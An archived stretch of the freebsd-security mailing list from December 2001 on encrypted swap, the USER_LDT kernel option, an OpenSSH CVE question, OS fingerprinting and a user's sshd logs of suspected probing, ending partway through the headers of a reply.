From owner-freebsd-security  Sun Dec  2  0:51:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163])
	by hub.freebsd.org (Postfix) with ESMTP id 79E4937B416
	for <security@FreeBSD.ORG>; Sun,  2 Dec 2001 00:51:14 -0800 (PST)
Received: from critter.freebsd.dk (localhost [127.0.0.1])
	by critter.freebsd.dk (8.11.6/8.11.6) with ESMTP id fB28npY52436;
	Sun, 2 Dec 2001 09:49:51 +0100 (CET)
	(envelope-from phk@critter.freebsd.dk)
To: freebsd-security@rikrose.net
Cc: security@FreeBSD.ORG
Subject: Re: philosophical question... 
In-Reply-To: Your message of "Sun, 02 Dec 2001 01:08:49 GMT."
             <Pine.LNX.4.21.0112020058020.4289-100000@pkl.net> 
Date: Sun, 02 Dec 2001 09:49:51 +0100
Message-ID: <52434.1007282991@critter.freebsd.dk>
From: Poul-Henning Kamp <phk@critter.freebsd.dk>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

In message <Pine.LNX.4.21.0112020058020.4289-100000@pkl.net>, freebsd-security@
rikrose.net writes:
>On Sat, 1 Dec 2001, Colin Percival wrote:
>> >Seems like an OpenBSD feature :P
>
>>    Still, I have to agree that this sounds pretty OpenBSDish... looking at 
>> the BSDs as a whole I'd say it would make sense for this to be added into 
>> OpenBSD first and ported to FreeBSD once it has proved itself.
>
>Anyone mind if I start a discussion about encrypted swap? I know I had the
>option under OpenBSD (and yes, it was on), but I still don't understand
>the implications.

Encrypted swap is coming to FreeBSD as part of the DARPA contract
NAI has won.  Stay tuned.

-- 
Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG         | TCP/IP since RFC 956
FreeBSD committer       | BSD since 4.3-tahoe    
Never attribute to malice what can adequately be explained by incompetence.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sun Dec  2  4:59:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from brea.mc.mpls.visi.com (brea.mc.mpls.visi.com [208.42.156.100])
	by hub.freebsd.org (Postfix) with ESMTP
	id A109137B41D; Sun,  2 Dec 2001 04:59:25 -0800 (PST)
Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193])
	by brea.mc.mpls.visi.com (Postfix) with ESMTP
	id 6F1A52DDBDD; Sun,  2 Dec 2001 06:59:24 -0600 (CST)
Received: (from hawkeyd@localhost)
	by sheol.localdomain (8.11.1/8.11.1) id fB2CxNh62460;
	Sun, 2 Dec 2001 06:59:23 -0600 (CST)
	(envelope-from hawkeyd)
Date: Sun, 2 Dec 2001 06:59:23 -0600 (CST)
Message-Id: <200112021259.fB2CxNh62460@sheol.localdomain>
Mime-Version: 1.0
X-Newsreader: knews 0.9.8a
Reply-To: hawkeyd@visi.com
Organization: if (!FIFO) if (!LIFO) break;
References: <20011202120451.R6917-100000_gamplex.bde.org@ns.sol.net>
    <XFMail.011201170928.jhb_FreeBSD.org@ns.sol.net>
In-Reply-To: <XFMail.011201170928.jhb_FreeBSD.org@ns.sol.net>
From: hawkeyd@visi.com (D J Hawkey Jr)
Subject: Re: options USER_LDT
X-Original-Newsgroups: sol.lists.freebsd.security
To: jhb@FreeBSD.ORG, security@FreeBSD.ORG
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

In article <XFMail.011201170928.jhb_FreeBSD.org@ns.sol.net>,
	jhb@FreeBSD.ORG writes:
> 
> On 02-Dec-01 Bruce Evans wrote:
>> On Sat, 1 Dec 2001, John Baldwin wrote:
>> 
>>> On 01-Dec-01 Dave wrote:
>>> >
>>> > I really have no clue what the kernel option:
>>> > options       USER_LDT
>>> >
>>> > means, except this rugged definition I found in LINT (paraphrase):
>>> > "Allow applications running in user space to manipulate the Local
>>> > Descriptor Table (LDT)"
>>> >
>>> > Since it didn't come in the GENERIC (FBSD 4.4 REL), I'm assuming that
>>> > someone, somewhere, thought it would be a good idea to have this disabled
>>> > by default and maybe it was meant to be added in only by people who know
>>> > what they are doing.
>>>
>>> No, it's enabled by default, not disabled by default.
>> 
>> Er, not in RELENG_4.  It can only be enabled by default if it doesn't exist,
>> as in -current :-).
> 
> Ah, nm, I misread it thinking that the option was gone from 4.4 completely.  To
> answer the original question then: it's not enabled by default most likely
> because when it was added as a new feature it was left as an option that was
> off by default so that any bugs it might have wouldn't bite people he didn't
> need it.

Um, guys? I think your language is becoming too tortured. Does USER_LDT
still exist as a kernel option, and is it still doc'd in LINT? Does it
pose a security risk in the more current releases? And is it enabled now
by default, or simply depreciated, and no longer a possible "gotcha" in
running Wine or mplayer?

>> Bruce

Dave

-- 

Windows: "Where do you want to go today?"
Linux: "Where do you want to go tomorrow?"
FreeBSD: "Are you guys coming, or what?"


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sun Dec  2  6:23: 4 2001
Delivered-To: freebsd-security@freebsd.org
Received: from pkl.net (spoon.pkl.net [212.111.57.14])
	by hub.freebsd.org (Postfix) with ESMTP id 73CB737B405
	for <security@FreeBSD.ORG>; Sun,  2 Dec 2001 06:23:01 -0800 (PST)
Received: from localhost (rik@localhost)
	by pkl.net (8.9.3/8.9.3) with ESMTP id OAA24878
	for <security@FreeBSD.ORG>; Sun, 2 Dec 2001 14:22:59 GMT
Date: Sun, 2 Dec 2001 14:22:59 +0000 (GMT)
From: freebsd-security@rikrose.net
X-Sender: rik@pkl.net
To: security@FreeBSD.ORG
Subject: Re: options USER_LDT
In-Reply-To: <200112021259.fB2CxNh62460@sheol.localdomain>
Message-ID: <Pine.LNX.4.21.0112021420370.24827-100000@pkl.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Sun, 2 Dec 2001, D J Hawkey Jr wrote:
> Um, guys? I think your language is becoming too tortured.

<nodnod>

> Does USER_LDT still exist as a kernel option, and is it still doc'd in
> LINT?

Yes.

> Does it pose a security risk in the more current releases?

Aparently not, but I haven't allowe anyone else to have an account the the
only machine I've got it on.

> And is it enabled now by default, or simply depreciated, and no longer
> a possible "gotcha" in running Wine or mplayer?

It is not enabled by default, but was still available for use if you
wanted it.

You wouldn't guess I installed mplayer yesterday afternoon, would you :)

-- 
PGP Key: D2729A3F - Keyserver: wwwkeys.uk.pgp.net - rich at rdrose dot org
Key fingerprint = 5EB1 4C63 9FAD D87B 854C  3DED 1408 ED77 D272 9A3F
Public key also encoded with outguess on http://rikrose.net


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sun Dec  2  6:56: 9 2001
Delivered-To: freebsd-security@freebsd.org
Received: from straylight.ringlet.net (discworld.nanolink.com [217.75.135.248])
	by hub.freebsd.org (Postfix) with SMTP id 9F9AE37B419
	for <security@FreeBSD.ORG>; Sun,  2 Dec 2001 06:56:02 -0800 (PST)
Received: (qmail 8105 invoked by uid 1000); 2 Dec 2001 14:55:16 -0000
Date: Sun, 2 Dec 2001 16:55:16 +0200
From: Peter Pentchev <roam@ringlet.net>
To: freebsd-security@rikrose.net
Cc: security@FreeBSD.ORG
Subject: Re: options USER_LDT
Message-ID: <20011202165515.A7575@straylight.oblivion.bg>
Mail-Followup-To: freebsd-security@rikrose.net, security@FreeBSD.ORG
References: <200112021259.fB2CxNh62460@sheol.localdomain> <Pine.LNX.4.21.0112021420370.24827-100000@pkl.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <Pine.LNX.4.21.0112021420370.24827-100000@pkl.net>; from freebsd-security@rikrose.net on Sun, Dec 02, 2001 at 02:22:59PM +0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Sun, Dec 02, 2001 at 02:22:59PM +0000, freebsd-security@rikrose.net wrote:
> On Sun, 2 Dec 2001, D J Hawkey Jr wrote:
> > Um, guys? I think your language is becoming too tortured.
> 
> <nodnod>
> 
> > Does USER_LDT still exist as a kernel option, and is it still doc'd in
> > LINT?
> 
> Yes.

Yes and yes in 4.x.  In 5.x, it is no longer available, because it is on
by default.

> > Does it pose a security risk in the more current releases?
> 
> Aparently not, but I haven't allowe anyone else to have an account the the
> only machine I've got it on.

It has *never* posed any kind of security risk.

> > And is it enabled now by default, or simply depreciated, and no longer
> > a possible "gotcha" in running Wine or mplayer?
> 
> It is not enabled by default, but was still available for use if you
> wanted it.

This is true of 4.x.  For 5.x after Feb 23 2001, it is always enabled
and there is no way of turning it off.

G'luck,
Peter

-- 
If I were you, who would be reading this sentence?

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sun Dec  2  9:41:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail5.speakeasy.net (mail5.speakeasy.net [216.254.0.205])
	by hub.freebsd.org (Postfix) with ESMTP id F0DC437B405
	for <security@FreeBSD.ORG>; Sun,  2 Dec 2001 09:41:36 -0800 (PST)
Received: (qmail 21028 invoked from network); 2 Dec 2001 17:41:35 -0000
Received: from unknown (HELO laptop.baldwin.cx) ([64.81.54.73]) (envelope-sender <jhb@FreeBSD.org>)
          by mail5.speakeasy.net (qmail-ldap-1.03) with SMTP
          for <hawkeyd@visi.com>; 2 Dec 2001 17:41:35 -0000
Message-ID: <XFMail.011202094135.jhb@FreeBSD.org>
X-Mailer: XFMail 1.4.0 on FreeBSD
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
In-Reply-To: <200112021259.fB2CxNh62460@sheol.localdomain>
Date: Sun, 02 Dec 2001 09:41:35 -0800 (PST)
From: John Baldwin <jhb@FreeBSD.org>
To: (D J Hawkey Jr) <hawkeyd@visi.com>
Subject: Re: options USER_LDT
Cc: security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


On 02-Dec-01 D J Hawkey Jr wrote:
> In article <XFMail.011201170928.jhb_FreeBSD.org@ns.sol.net>,
>       jhb@FreeBSD.ORG writes:
>> 
>> On 02-Dec-01 Bruce Evans wrote:
>>> On Sat, 1 Dec 2001, John Baldwin wrote:
>>> 
>>>> On 01-Dec-01 Dave wrote:
>>>> >
>>>> > I really have no clue what the kernel option:
>>>> > options       USER_LDT
>>>> >
>>>> > means, except this rugged definition I found in LINT (paraphrase):
>>>> > "Allow applications running in user space to manipulate the Local
>>>> > Descriptor Table (LDT)"
>>>> >
>>>> > Since it didn't come in the GENERIC (FBSD 4.4 REL), I'm assuming that
>>>> > someone, somewhere, thought it would be a good idea to have this
>>>> > disabled
>>>> > by default and maybe it was meant to be added in only by people who know
>>>> > what they are doing.
>>>>
>>>> No, it's enabled by default, not disabled by default.
>>> 
>>> Er, not in RELENG_4.  It can only be enabled by default if it doesn't
>>> exist,
>>> as in -current :-).
>> 
>> Ah, nm, I misread it thinking that the option was gone from 4.4 completely. 
>> To
>> answer the original question then: it's not enabled by default most likely
>> because when it was added as a new feature it was left as an option that was
>> off by default so that any bugs it might have wouldn't bite people he didn't
>> need it.
> 
> Um, guys? I think your language is becoming too tortured. Does USER_LDT
> still exist as a kernel option, and is it still doc'd in LINT? Does it
> pose a security risk in the more current releases? And is it enabled now
> by default, or simply depreciated, and no longer a possible "gotcha" in
> running Wine or mplayer?

In 4.4, it is still a kernel option not enabled by default.  It poses no
security risk in any release of FreeBSD.  In 5.0 it is now on by default and no
longer a kernel option because we decided it has now been tested long enough
and we no longer need a fallback to disable it.

-- 

John Baldwin <jhb@FreeBSD.org>  <><  http://www.FreeBSD.org/~jhb/
"Power Users Use the Power to Serve!"  -  http://www.FreeBSD.org/

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sun Dec  2 11:54: 1 2001
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50])
	by hub.freebsd.org (Postfix) with ESMTP id 2045237B419
	for <security@FreeBSD.org>; Sun,  2 Dec 2001 11:53:59 -0800 (PST)
Received: from localhost (arr@localhost)
	by fledge.watson.org (8.11.6/8.11.5) with SMTP id fB2JZb419622;
	Sun, 2 Dec 2001 14:35:37 -0500 (EST)
	(envelope-from arr@FreeBSD.org)
X-Authentication-Warning: fledge.watson.org: arr owned process doing -bs
Date: Sun, 2 Dec 2001 14:35:36 -0500 (EST)
From: "Andrew R. Reiter" <arr@FreeBSD.org>
X-Sender: arr@fledge.watson.org
To: Poul-Henning Kamp <phk@critter.freebsd.dk>
Cc: freebsd-security@rikrose.net, security@FreeBSD.org
Subject: Re: philosophical question... 
In-Reply-To: <52434.1007282991@critter.freebsd.dk>
Message-ID: <Pine.NEB.3.96L.1011202143504.19612A-100000@fledge.watson.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

:
:Encrypted swap is coming to FreeBSD as part of the DARPA contract
:NAI has won.  Stay tuned.

Any idea on what kind of algorithm support?

--
Andrew R. Reiter
arr@watson.org
arr@FreeBSD.org


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sun Dec  2 12:16:56 2001
Delivered-To: freebsd-security@freebsd.org
Received: from deneb.healthnet-sl.es (deneb.healthnet-sl.es [213.201.25.69])
	by hub.freebsd.org (Postfix) with ESMTP id 0AFE437B405
	for <security@freebsd.org>; Sun,  2 Dec 2001 12:16:47 -0800 (PST)
Received: (from root@localhost)
	by deneb.healthnet-sl.es (8.11.6/8.11.3) id fB2KGjt57702
	for security@freebsd.org; Sun, 2 Dec 2001 21:16:45 +0100 (CET)
	(envelope-from webmaster@healthnet.es)
Received: from ntw3 ([213.201.25.250])
	by deneb.healthnet-sl.es (8.11.6/8.11.3av) with SMTP id fB2KGh657692
	for <security@FreeBSD.ORG>; Sun, 2 Dec 2001 21:16:43 +0100 (CET)
	(envelope-from webmaster@healthnet.es)
Message-ID: <01d101c17b6e$2f43b530$0400000a@hin>
From: "Webmaster" <webmaster@healthnet.es>
To: <security@freebsd.org>
Subject: OpenSSH vulnerability?
Date: Sun, 2 Dec 2001 21:16:09 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
X-Virus-Scanned: by AMaViS perl-10
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Is http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0816 related to the
"OpenSSH binary exploit" mentioned earlier here?

Carlos Amengual


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sun Dec  2 12:21:39 2001
Delivered-To: freebsd-security@freebsd.org
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163])
	by hub.freebsd.org (Postfix) with ESMTP
	id 2154937B419; Sun,  2 Dec 2001 12:21:37 -0800 (PST)
Received: from critter.freebsd.dk (localhost [127.0.0.1])
	by critter.freebsd.dk (8.11.6/8.11.6) with ESMTP id fB2KKDY64356;
	Sun, 2 Dec 2001 21:20:14 +0100 (CET)
	(envelope-from phk@critter.freebsd.dk)
To: "Andrew R. Reiter" <arr@FreeBSD.org>
Cc: freebsd-security@rikrose.net, security@FreeBSD.org
Subject: Re: philosophical question... 
In-Reply-To: Your message of "Sun, 02 Dec 2001 14:35:36 EST."
             <Pine.NEB.3.96L.1011202143504.19612A-100000@fledge.watson.org> 
Date: Sun, 02 Dec 2001 21:20:13 +0100
Message-ID: <64354.1007324413@critter.freebsd.dk>
From: Poul-Henning Kamp <phk@critter.freebsd.dk>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

In message <Pine.NEB.3.96L.1011202143504.19612A-100000@fledge.watson.org>, "And
rew R. Reiter" writes:
>:
>:Encrypted swap is coming to FreeBSD as part of the DARPA contract
>:NAI has won.  Stay tuned.
>
>Any idea on what kind of algorithm support?

Not yet.  You'll be able to change the algorithm quite easily.

-- 
Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG         | TCP/IP since RFC 956
FreeBSD committer       | BSD since 4.3-tahoe    
Never attribute to malice what can adequately be explained by incompetence.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sun Dec  2 12:39:45 2001
Delivered-To: freebsd-security@freebsd.org
Received: from deneb.healthnet-sl.es (deneb.healthnet-sl.es [213.201.25.69])
	by hub.freebsd.org (Postfix) with ESMTP id 3E72D37B417
	for <security@freebsd.org>; Sun,  2 Dec 2001 12:39:38 -0800 (PST)
Received: (from root@localhost)
	by deneb.healthnet-sl.es (8.11.6/8.11.3) id fB2KdbG57815
	for security@freebsd.org; Sun, 2 Dec 2001 21:39:37 +0100 (CET)
	(envelope-from webmaster@healthnet.es)
Received: from ntw3 ([213.201.25.250])
	by deneb.healthnet-sl.es (8.11.6/8.11.3av) with SMTP id fB2KdY657807
	for <security@FreeBSD.ORG>; Sun, 2 Dec 2001 21:39:36 +0100 (CET)
	(envelope-from webmaster@healthnet.es)
Message-ID: <01dd01c17b71$6130e600$0400000a@hin>
From: "Webmaster" <webmaster@healthnet.es>
To: <security@freebsd.org>
References: <01d101c17b6e$2f43b530$0400000a@hin>
Subject: RE: OpenSSH vulnerability?
Date: Sun, 2 Dec 2001 21:39:01 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
X-Virus-Scanned: by AMaViS perl-10
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

More to the point, I was asking about the latest openssh fixes that I just
received from RedHat recently (which involved new fixes for the already known
CAN-2001-0816, and at least one other minor problem). I got the SRPM and
while it is difficult to interpret the implications of the diffs, the changes
do not suggest that any remote exploit was fixed. False alarm I suppose.

Anything new about the "exploit", anyway?


Carlos Amengual

> Is http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0816 related to
the
> "OpenSSH binary exploit" mentioned earlier here?


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sun Dec  2 13: 5:33 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailsrv.otenet.gr (mailsrv.otenet.gr [195.170.0.5])
	by hub.freebsd.org (Postfix) with ESMTP id BEF6F37B639
	for <freebsd-security@FreeBSD.ORG>; Sun,  2 Dec 2001 13:05:24 -0800 (PST)
Received: from hades.hell.gr (patr530-a100.otenet.gr [212.205.215.100])
	by mailsrv.otenet.gr (8.11.5/8.11.5) with ESMTP id fB2L5Jm05437;
	Sun, 2 Dec 2001 23:05:20 +0200 (EET)
Received: (from charon@localhost)
	by hades.hell.gr (8.11.6/8.11.6) id fB2L5Jd19959;
	Sun, 2 Dec 2001 23:05:19 +0200 (EET)
	(envelope-from charon@labs.gr)
Date: Sun, 2 Dec 2001 23:05:17 +0200
From: Giorgos Keramidas <charon@labs.gr>
To: Bara Zani <bara_zani@yahoo.com>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: freebsd 4.4 finger tips ?
Message-ID: <20011202210517.GA17313@hades.hell.gr>
References: <009c01c176e1$9025f390$6e00a8c0@kushkush>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <009c01c176e1$9025f390$6e00a8c0@kushkush>
User-Agent: Mutt/1.3.23.1i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On 2001-11-26 20:19:29, Bara Zani wrote:
> Hi ,
> I am running freebsd 4.4 release and ipfilter as a dsl gateway to a home
> network .
> ipfilter is configured to allow only ssh and https in from tun0 .
> never the less nmap will identify the os as freebsd 4.something .
> how can i erase the finger tips ?

Try reading the blackhole(4) manual page :-)

-giorgos

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sun Dec  2 13:37:58 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.neophile.net (neophile.net [195.224.237.7])
	by hub.freebsd.org (Postfix) with ESMTP id D6B1737B405
	for <security@freebsd.org>; Sun,  2 Dec 2001 13:37:54 -0800 (PST)
Received: from host213-123-120-79.in-addr.btopenworld.com ([213.123.120.79] helo=celly.neophile.net)
	by mail.neophile.net with esmtp (Exim 3.15 #1)
	id 16AeJ0-00075o-00
	for security@FreeBSD.ORG; Sun, 02 Dec 2001 21:37:46 +0000
Message-Id: <5.1.0.14.2.20011202213039.00a99d88@mail.btinternet.com>
X-Sender: slamdunk@pop3.neophile.net
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Sun, 02 Dec 2001 21:39:10 +0000
To: security@FreeBSD.ORG
From: slamdunk <slamdunk@neophile.net>
Subject: Is this an attempt on SSH hack?
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Dec 2 01:01:01 www sshd[15014]: log: Connection from 213.207.20.90 port 1685
Dec 2 01:01:06 www sshd[15015]: log: Connection from 213.207.20.90 port 1697
Dec 2 01:01:06 www sshd[15015]: fatal: Did not receive ident string.
Dec 2 01:01:11 www sshd[15014]: fatal: Did not receive ident string.
Dec 2 01:02:28 www sshd[15026]: log: Connection from 213.196.5.84 port 2867
Dec 2 01:02:40 www sshd[15027]: log: Connection from 213.196.5.84 port 2868
Dec 2 01:02:42 www sshd[15028]: log: Connection from 213.196.5.84 port 2869
Dec 2 01:02:44 www sshd[15029]: log: Connection from 213.196.5.84 port 2870
Dec 2 01:02:45 www sshd[15029]: fatal: Local: Corrupted check bytes on input.
Dec 2 01:02:45 www sshd[15029]: fatal: Local: Corrupted check bytes on input.
Dec 2 01:02:46 www sshd[15030]: log: Connection from 213.196.5.84 port 2871
Dec 2 01:02:47 www sshd[15031]: log: Connection from 213.196.5.84 port 2872
Dec 2 01:02:49 www sshd[15032]: log: Connection from 213.196.5.84 port 2873

Repeated about 20 times on sequential ports

Dec 2 01:03:13 www sshd[15044]: log: Connection from 213.196.5.84 port 2888
Dec 2 01:03:15 www sshd[15045]: log: Connection from 213.196.5.84 port 2890
Dec 2 01:03:17 www sshd[15046]: log: Connection from 213.196.5.84 port 2892
Dec 2 01:03:19 www sshd[15047]: log: Connection from 213.196.5.84 port 2893
Dec 2 01:03:21 www sshd[15048]: log: Connection from 213.196.5.84 port 2894
Dec 2 01:03:23 www sshd[15049]: log: Connection from 213.196.5.84 port 2896
Dec 2 01:03:25 www sshd[15050]: log: Connection from 213.196.5.84 port 2897

Repeated up to port 3784

Dec 2 01:22:55 www sshd[15834]: log: Connection from 213.196.5.84 port 3784

Running SSH Version OpenSSH-1.2.2, protocol version 1.5.
Compiled with SSL.

Need I be worried?


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sun Dec  2 13:42:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost.freebsd.lublin.pl (mailhost.freebsd.lublin.pl [212.182.115.12])
	by hub.freebsd.org (Postfix) with ESMTP id 2449237B417
	for <security@freebsd.org>; Sun,  2 Dec 2001 13:42:21 -0800 (PST)
Received: (from root@localhost)
	by mailhost.freebsd.lublin.pl (8.11.6/8.11.4) id fB2LgFH52212;
	Sun, 2 Dec 2001 22:42:15 +0100 (CET)
	(envelope-from venglin@freebsd.lublin.pl)
Received: from there (IDENT:venglin@clitoris.czuby.net [212.182.126.2])
	by mailhost.freebsd.lublin.pl (8.11.6/8.11.4av) with SMTP id fB2LgDf52204;
	Sun, 2 Dec 2001 22:42:14 +0100 (CET)
	(envelope-from venglin@freebsd.lublin.pl)
Message-Id: <200112022142.fB2LgDf52204@mailhost.freebsd.lublin.pl>
Content-Type: text/plain;
  charset="iso-8859-2"
From: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
Organization: czuby.net
To: slamdunk <slamdunk@neophile.net>, security@freebsd.org
Subject: Re: Is this an attempt on SSH hack?
Date: Sun, 2 Dec 2001 22:42:13 +0100
X-Mailer: KMail [version 1.3.1]
References: <5.1.0.14.2.20011202213039.00a99d88@mail.btinternet.com>
In-Reply-To: <5.1.0.14.2.20011202213039.00a99d88@mail.btinternet.com>
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
X-Virus-Scanned: by AMaViS perl-10
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
